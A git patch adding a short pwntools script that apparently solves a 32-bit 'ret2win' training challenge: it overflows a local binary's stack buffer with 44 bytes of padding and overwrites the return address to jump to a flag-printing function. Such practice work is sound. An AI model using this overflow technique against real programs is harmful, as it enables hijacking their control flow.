From 8251d7522b8b096d4ee6be534bcbb6769250b6f1 Mon Sep 17 00:00:00 2001 From: Arav Garg <39301993+AravGarg@users.noreply.github.com> Date: Sat, 28 Mar 2020 14:23:20 +0530 Subject: [PATCH] exploit for 32-bit ret2win --- ret2win32.py | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ret2win32.py diff --git a/ret2win32.py b/ret2win32.py new file mode 100644 index 0000000..2566bc3 --- /dev/null +++ b/ret2win32.py @@ -0,0 +1,17 @@ +from pwn import * +target=process('./ret2win32') + +#intial payload +payload="A"*44 + +#return address to print flag +ret2win=0x8048659 + +#final payload +payload+=p32(ret2win) +payload+="\x00"*2 + +#send payload +target.sendline(payload) + +target.interactive()